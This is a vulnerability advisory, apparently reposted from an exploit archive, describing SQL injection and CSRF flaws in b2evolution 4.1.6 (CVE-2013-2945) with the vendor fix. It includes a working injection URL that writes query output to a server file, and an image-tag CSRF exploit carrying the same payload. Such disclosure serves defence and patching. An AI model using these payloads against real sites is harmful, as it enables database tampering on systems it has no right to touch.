b2evolution version 4.1.6 suffers from remote SQL injection and cross site request forgery vulnerabilities.
Product: b2evolution
Vendor: b2evolution Group
Vulnerable Version(s): 4.1.6 and probably prior
Tested Version: 4.1.6
Vendor Notification: April 10, 2013
Vendor Patch: April 29, 2013
Public Disclosure: May 1, 2013
Vulnerability Type: SQL Injection [CWE-89]
CVE Reference: CVE-2013-2945
Risk Level: Medium
CVSSv2 Base Score: 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
-----------------------------------------------------------------------------------------------
Advisory Details:
High-Tech Bridge Security Research Lab discovered SQL injection vulnerability in b2evolution, which can be exploited to alter SQL requests passed to the vulnerable application's database.
1) SQL Injection in b2evolution: CVE-2013-2945
The vulnerability exists due to insufficient validation of HTTP GET parameter "show_statuses" in "/blogs/admin.php" script. A remote authenticated administrator can execute arbitrary SQL commands in application's database.
Depending on database and system configuration, PoC code below will create a "/tmp/file.txt" file, containing MySQL version:
http://[host]/blogs/admin.php?submit=Search&ctrl=items&tab=full&blog=1&show_statuses[]=1') )) UNION SELECT version() INTO OUTFILE '/tmp/file.txt' --
This vulnerability is also exploitable via CSRF vector, since the application is prone to Cross-Site Request Forgery (CSRF) attacks. In order to do so an attacker should trick a logged-in administrator to visit malicious web page with CSRF exploit.
Basic CSRF exploit:
<img src="http://[host]/blogs/admin.php?submit=Search&ctrl=items&tab=full&blog=1&show_statuses[]=1') )) UNION SELECT version() INTO OUTFILE '/tmp/file.txt' --">
-----------------------------------------------------------------------------------------------
Solution:
Upgrade to b2evolution 4.1.7
More Information:
http://b2evolution.net/news/2013/04/29/b2evolution-4-1-7-and-5-0-3
-----------------------------------------------------------------------------------------------
# 0day.today [2018-03-05] #